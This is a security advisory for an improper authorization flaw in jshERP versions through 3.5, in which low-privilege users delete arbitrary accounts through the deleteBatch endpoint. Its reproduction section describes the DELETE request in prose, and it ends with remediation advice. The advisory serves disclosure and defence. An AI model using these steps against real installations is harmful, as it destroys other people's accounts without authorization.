jshERP Improper Authorization Vulnerability in Endpoint deleteBatch Allowing Arbitrary Account Deletion

An improper authorization vulnerability has been identified in jshERP versions through 3.5. The issue resides in the deleteBatch endpoint of the user management component. Low-privilege users can manipulate the ids parameter to perform unauthorized batch deletion of user accounts, a function reserved for system administrators. This vulnerability can be exploited remotely and has been publicly disclosed.

Impact

Exploitation of this vulnerability allows for the unauthorized deletion of multiple user accounts simultaneously.

Reproduction

To reproduce this vulnerability, log in with a low-privilege user account and send a DELETE request to the /jshERP-boot/user/deleteBatch endpoint. Include a comma-separated list of user IDs in the ids parameter. The request must also include a valid access token in the headers. This will trigger the deletion of the specified user accounts, bypassing authorization checks.

Remediation

It is recommended to implement proper authorization checks for the deleteBatch endpoint, ensuring that only users with administrative privileges can perform batch deletion operations.